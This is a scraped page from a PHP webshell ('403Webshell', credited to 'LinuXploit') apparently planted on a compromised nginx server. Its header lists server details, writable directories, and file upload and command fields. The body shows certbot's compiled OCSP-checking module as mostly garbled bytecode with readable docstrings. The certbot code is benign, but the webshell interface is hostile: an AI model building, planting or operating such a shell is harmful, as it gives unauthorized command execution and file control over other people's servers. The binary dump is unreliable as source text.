403Webshell
Server IP : 178.105.222.151  /  Your IP : 216.73.216.38
Web Server : nginx/1.28.3
System : Linux MNK 7.0.0-15-generic #15-Ubuntu SMP PREEMPT_DYNAMIC Wed Apr 22 16:06:43 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/certbot/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/python3/dist-packages/certbot/__pycache__/ocsp.cpython-314.pyc
+
�K�g�:��r�Rt^RIHt^RIHt^RIt^RIt^RIt^RIHt^RIHt^RIH	t	^RI
Ht^RIH
t
^R	IHt^R
IHt^RIHt^RIHt^R
IHt^RIt^RIt^RIHt^RIHt^RIHt^RIHt^RIHt]P@!]!4t"!RR4t#RRlt$RRlt%RRlt&RRlt'RRlt(R#)z*Tools for checking certificate revocation.)�datetime)�	timedeltaN)�PIPE)�Optional)�Tuple)�x509)�InvalidSignature)�UnsupportedAlgorithm)�default_backend)�hashes)�
serialization)�ocsp)�crypto_util)�errors)�util)�getenv)�
RenewableCertc�ta�]tRt^toRtRV3RlRlltV3RlRltR
V3RlRlltV3RlR	ltR
t	Vt
R#)�RevocationCheckerzEThis class figures out OCSP checking on this system, and performs it.c�$<�V^8�dQhRS[RR/#)��enforce_openssl_binary_usage�returnN)�bool)�format�
__classdict__s"��./usr/lib/python3/dist-packages/certbot/ocsp.py�__annotate__�RevocationChecker.__annotate__!s���=�=�T�=�d�=�c	�t�RVnWnVP'd�\P!R4'g\PR4RVnR#\P!.R	O\\RR\P!4R7pRVP9dRVnR#RVnR#R#)
F�opensslz-openssl not installed, can't check revocationTN)�stdout�stderr�universal_newlines�check�envz	Missing =c��RV,.#)zHost=���hosts&r�<lambda>�,RevocationChecker.__init__.<locals>.<lambda>0s��w��~�.>rc�
�RV.#)�Hostr(r)s&rr+r,2s��v�t�nr)r!r
�-header�var�val)�broken�use_openssl_binaryr�
exe_exists�logger�info�
subprocess�runr�env_no_snap_for_external_callsr#�	host_args)�selfr�test_host_formats&& r�__init__�RevocationChecker.__init__!s������">���"�"�"��?�?�9�-�-����K�L�"���� *�~�~�.Z�,0��RV�+0�d�6Y�6Y�6[� ]���.�5�5�5�!>���!<���#rc�&<�V^8�dQhRS[RS[/#�r�certr)rr)rrs"�rrr4s���
K�
K��
K�4�
Krc�N�VPVPVP4#)z�Get revoked status for a particular cert version.

.. todo:: Make this a non-blocking call

:param `.interfaces.RenewableCert` cert: Certificate object
:returns: True if revoked; False if valid or the check failed or cert is expired.
:rtype: bool

)�ocsp_revoked_by_paths�	cert_path�
chain_path)r;rAs&&r�ocsp_revoked�RevocationChecker.ocsp_revoked4s���)�)�$�.�.�$�/�/�J�Jrc�2<�V^8�dQhRS[RS[RS[RS[/#)rrDrE�timeoutr��str�intr)rrs"�rrr@s0���M�M�s�M��M�c�M�[_�Mrc�L�VP'dR#\P!\P4p\
P!V4V8:dR#\V4wrVV'd	V'gR#VP'dVPWWeV4#\WWS4#)aPerforms the OCSP revocation check

:param str cert_path: Certificate filepath
:param str chain_path: Certificate chain
:param int timeout: Timeout (in seconds) for the OCSP query

:returns: True if revoked; False if valid or the check failed or cert is expired.
:rtype: bool

F)r2r�now�pytz�UTCr�notAfter�_determine_ocsp_serverr3�_check_ocsp_openssl_bin�_check_ocsp_cryptography)r;rDrErIrN�urlr*s&&&&   rrC�'RevocationChecker.ocsp_revoked_by_paths@s}���;�;�;��
�l�l�4�8�8�$�����	�*�c�1��*�9�5�	���3���"�"�"��/�/�	�t�RY�Z�Z�'�	�s�L�Lrc�><�V^8�dQhRS[RS[RS[RS[RS[RS[/#)rrDrEr*rUrIrrJ)rrs"�rrr]s;���#=�#=��#=�#�#=�&)�#=�03�#=�>A�#=�FJ�#=rc�j�\R4p\R4pRpVfVe	VeTMTpVfRV.p	M+VPR4'dV\R4RpRVRV.p	RRR	R
VRVRVR
VRR\V4R.VP	V4,V	,p
\
P
RV4\
P
RPV
44\P!V
\
PR7wr�\YT4# \Pd\
PRT4R#i;i)�
http_proxy�
HTTP_PROXYNz-urlzhttp://z-hostz-pathr!r
z	-no_noncez-issuerz-certz-CAfilez
-verify_otherz-trust_otherz-timeoutr/zQuerying OCSP for %s� )�log�*OCSP check failed for %s (are we offline?)F)r�
startswith�lenrKr:r5�debug�joinr�
run_scriptr�SubprocessErrorr6�_translate_ocsp_query)
r;rDrEr*rUrI�env_http_proxy�env_HTTP_PROXY�
proxy_host�url_opts�cmd�output�errs
&&&&&&       rrS�)RevocationChecker._check_ocsp_openssl_bin]s9�� ��-����-���
��%��)C�+9�+E��>�J�����}�H��$�$�Y�/�/�'��I���8�
���W�c�:�H��&���*��	��*��
���3�w�<���!�N�N�4�0�1�4<�<��	���+�Y�7����S�X�X�c�]�#�	��/�/�#�6�<�<�@�K�F�%�Y��<�<���%�%�	��K�K�D�i�P��	�s�(D�+D2�1D2)r2r:r3N)F)�
)�__name__�
__module__�__qualname__�__firstlineno__�__doc__r=rFrCrS�__static_attributes__�__classdictcell__)rs@rrrs4����O�=�=�&
K�
K�M�M�:#=�#=rrc�~�V^8�dQhR\R\\\,\\,3,/#)rrDr)rKrr)rs"rrr�s,����c��e�H�S�M�8�C�=�4P�.Q�rc�
�\VR4;_uu_4p\P!VP4\	44pRRR4XP
P
\P4p\PPpVPUu.uFpVPV8XgKVNK	ppV^,PPpTP#4pTP%R4^,P#R4pT'dYx3#\P!RYp4R# +'giL�;iuupi \P\3d\P!RT4Ru#i;i)z�Extract the OCSP server host from a certificate.

:param str cert_path: Path to the cert we're checking OCSP for
:rtype tuple:
:returns: (OCSP server URL or None, OCSP server host or None)

�rbNzCannot extract OCSP URI from %sz://�/z;Cannot process OCSP host from URL (%s) in certificate at %s)NN)�openr�load_pem_x509_certificate�readr
�
extensions�get_extension_for_class�AuthorityInformationAccess�AuthorityInformationAccessOID�OCSP�value�
access_method�access_location�ExtensionNotFound�
IndexErrorr5r6�rstrip�	partition)	rD�file_handlerrA�	extension�ocsp_oid�description�descriptionsrUr*s	&        rrRrR�s8��
�i��	�	�,��-�-�l�.?�.?�.A�?�CT�U��
�	��O�O�;�;�D�<[�<[�\�	��5�5�:�:��7@���B���&�4�4��@�$����B��1�o�-�-�3�3��
�*�*�,�C��=�=����"�)�)�#�.�D���y��
�K�K�M�s�^���'
�	��
B��
�"�"�J�/�����5�y�A����s6�.D4�AE�E�5E�;E�4E	�E�3F�Fc
�T�V^8�dQhR\R\R\R\R\/#)rrDrErUrIrrJ)rs"rrr�s1��.�.��.��.�3�.�QT�.�Y]�.rc��\VR4;_uu_4p\P!VP4\	44pRRR4\VR4;_uu_4p\P!VP4\	44pRRR4\
P!4pVPXX\P!44pVP4pVP\PP4p	\P !W)RR/VR7p
T
P*^�8wd#\&P)R	Y
P*4R#\
P,!T
P.4pTP0\
P2P48wd#\&P7R
YP04R#\9Y�YP4\&P;RYP<4TP<\
P>P@8H# +'giEL�;i +'giEL�;i \P"P$d\&P)RTRR7R#i;i \Bd*p\&P7\ET44Rp?R#Rp?i\FPHd*p\&P7\ET44Rp?R#Rp?i\Jd\&P7RT4R#\Ld,p
\&P7R
T\ET
44Rp
?
R#Rp
?
ii;i)rwNzContent-Typezapplication/ocsp-request)�data�headersrIr]T)�exc_infoFz*OCSP check failed for %s (HTTP status: %d)z'Invalid OCSP response status for %s: %sz%OCSP certificate status for %s is: %sz)Invalid signature on OCSP response for %sz!Invalid OCSP response for %s: %s.)'ryrrzr{r
r
�OCSPRequestBuilder�add_certificater�SHA1�build�public_bytesr�Encoding�DER�requests�post�
exceptions�RequestExceptionr5r6�status_code�load_der_ocsp_response�content�response_status�OCSPResponseStatus�
SUCCESSFUL�warning�_check_ocsp_responser`�certificate_status�OCSPCertStatus�REVOKEDr	rKr�Errorr�AssertionError)rDrErUrIr��issuerrA�builder�request�request_binary�response�
response_ocsp�e�errors&&&&          rrTrT�sv��	
�j�$�	�	�<��/�/��0A�0A�0C�_�EV�W��
 �	
�i��	�	�,��-�-�l�.?�.?�.A�?�CT�U��
��%�%�'�G��%�%�d�F�F�K�K�M�B�G��m�m�o�G��)�)�-�*@�*@�*D�*D�E�N���=�=��*8�:T�)U�)0�2�����s�"����@�)�Ma�Ma�b���/�/��0@�0@�A�M��$�$��(?�(?�(J�(J�J����@�� =� =�	?��O��]�V�G�	���<�� @� @�	B��/�/�4�3F�3F�3N�3N�N�N�U
 �	�	��	�	�	�����/�/�����@�)�VZ��[����$ �����s�1�v������<�<�����s�1�v������O����B�I�N���S����:�I�s�5�z�R�R���S�sq�.H�.H+�
H?�I=�H(	�+H<	�?7I:�9I:�=M�J,�,M�M�K(�(M�5M�M�M� L?�?Mc
�P�V^8�dQhRRRRR\PR\RR/#)	rr��ocsp.OCSPResponse�request_ocspzocsp.OCSPRequest�issuer_certrDrN�r�CertificaterK)rs"rrr�sA��!A�!A�(;�!A�K]�!A�&*�&6�&6�!A�CF�!A�KO�!Arc��VPVP8wd\R4h\WV4\VP\VP44'd7VPVP8wgVPVP8wd\R4h\P!\P4pVP'g\R4hVPV\^R7,8�d\R4hVP'd0VPV\^R7,
8d\R4hR#R#)z2Verify that the OCSP is valid for several criteriazMthe certificate in response does not correspond to the certificate in requestz<the issuer does not correspond to issuer of the certificate.zparam thisUpdate is not set.)�minutesz"param thisUpdate is in the future.z param nextUpdate is in the past.N)�
serial_numberr��_check_ocsp_response_signature�
isinstance�hash_algorithm�type�issuer_key_hash�issuer_name_hashrrNrOrP�this_update_utcr�next_update_utc)r�r�r�rDrNs&&&& rr�r��s���"�"�l�&@�&@�@��=�>�	>�#�=�y�I�
�}�3�3�T�,�:U�:U�5V�W�W��,�,��0L�0L�L��-�-��1N�1N�N��[�\�\��,�,�t�x�x�
 �C��(�(�(��;�<�<��$�$�s�Y�q�-A�'A�A��A�B�B��$�$�$��)F�)F��y�ab�Oc�Ic�)c��?�@�@�*d�$rc�L�V^8�dQhRRR\PR\RR/#)rr�r�r�rDrNr�)rs"rrr�s8��7^�7^�2E�7^�04�0@�0@�7^�MP�7^�UY�7^rc�z�RRlpVPVP8XgVPV!V48Xd\P	RV4TpEMf\P	RV4VP
Uu.uF9pVPVP8XgVPV!V48XgK7VNK;	ppV'g\
R4hV^,pVPVP8wd\
R4hVPP\P4p\PPPVP9pV'g\
R4hVP$p	V	'gQh\&P(!VP+4VP,VP.V	4VP$p
V
'g\
R	4h\&P(!VP+4VP,VP0V
4R
#uupi \P \"3dRpL�i;i)zIVerify an OCSP response signature against certificate issuer or responderc�D�V^8�dQhR\PR\/#r@)rr��bytes)rs"rr�4_check_ocsp_response_signature.<locals>.__annotate__�s$��S�S��(�(�S�U�Src�p�\PPVP44P#)N)r�SubjectKeyIdentifier�from_public_key�
public_key�digest)rAs&r�	_key_hash�1_check_ocsp_response_signature.<locals>._key_hash�s&���(�(�8�8����9J�K�R�R�RrzGOCSP response for certificate %s is signed by the certificate's issuer.zGOCSP response for certificate %s is delegated to an external responder.z0no matching responder certificate could be foundz?responder certificate is not signed by the certificate's issuerFz<responder is not authorized by issuer to sign OCSP responsesz#no signature hash algorithm definedN)�responder_name�subject�responder_key_hashr5r`�certificatesr�r�r|r}r�ExtendedKeyUsage�oid�ExtendedKeyUsageOID�OCSP_SIGNINGr�r�r��signature_hash_algorithmr�verify_signed_payloadr��	signature�tbs_certificate_bytes�tbs_response_bytes)r�r�rDr��responder_certrA�responder_certsr��delegate_authorized�chosen_cert_hash�chosen_response_hashs&&&        rr�r��s���S�	�$�$��(;�(;�;��/�/�9�[�3I�I����_��	 �$��	���^��	 �-:�,F�,F�S�,F�D�+�:�:�d�l�l�J�+�>�>�)�D�/�Q� �4�,F��S�� �!S�T�T�
)��+��� � �K�$7�$7�7� �"@�A�
A�	(�&�1�1�I�I�$�J_�J_�`�I�"&�(�(�">�">�"K�"K�y���"^��#� �!_�`�`�*�B�B�����	�)�)�+�*@�*@�*B�N�D\�D\�*8�*N�*N�P`�	b�)�A�A�� ��B�C�C��%�%�n�&?�&?�&A�=�CZ�CZ�&3�&F�&F�H\�^��KS��$�&�&�
�3�	(�"'��	(�s�74H�0H�;AH�H:�9H:c�H�V^8�dQhR\R\R\R\/#)rrD�ocsp_output�ocsp_errorsr)rKr)rs"rrr0s)����S��s����QU�rc�
a�RpVUu.uFpRPW4NK	ppV3RlV4wrgpV'dVP^4MRp	RV9gV'd	V	'g	V'd0\PRV4\P	RSV4R#V'dV	'gR#V'd2VP^4p	V	'd\PRV	4R	#\PR
SV4R#uupi)z7Parse openssl's weird output to work out what it means.z{0}: (WARNING.*)?{1}c3�r<"�TF,p\P!VS\PR7x�K.	R#5i))�flagsN)�re�search�DOTALL)�.0�pr�s& �r�	<genexpr>�(_translate_ocsp_query.<locals>.<genexpr>5s'����[�RZ�Q�b�i�i��;�b�i�i�H�H�RZ�s�47NzResponse verify OKz#Revocation status for %s is unknownzUncertain output:
%s
stderr:
%sFzOCSP revocation warning: %sTz2Unable to properly parse OCSP output: %s
stderr:%s)�good�revoked�unknown)r�groupr5r6r`r�)
rDr�r��states�s�patternsr�r�r�r�s
&f&       rrdrd0s����,�F�FL�M�f��'�.�.�y�<�f�H�M�[�RZ�[��D�7�#�d�j�j��m��G��K�/�T�g�'����9�9�E����9�;��T��	
�g��	��-�-��"����K�K�5�w�?�����L�"�K�	1���'Ns�D))rrrr�loggingr�r7r�typingrr�cryptographyr�cryptography.exceptionsrr	�cryptography.hazmat.backendsr
�cryptography.hazmat.primitivesrr�cryptography.x509r
rOr��certbotrrr�certbot.compat.osr�certbot.interfacesr�	getLoggerrnr5rrRrTr�r�rdr(rr�<module>rs���0����	������4�8�8�1�8�"������$�,�	�	�	�8�	$��b=�b=�J�<.�b!A�H7^�tr

Youez - 2016 - github.com/yon3zu
LinuXploit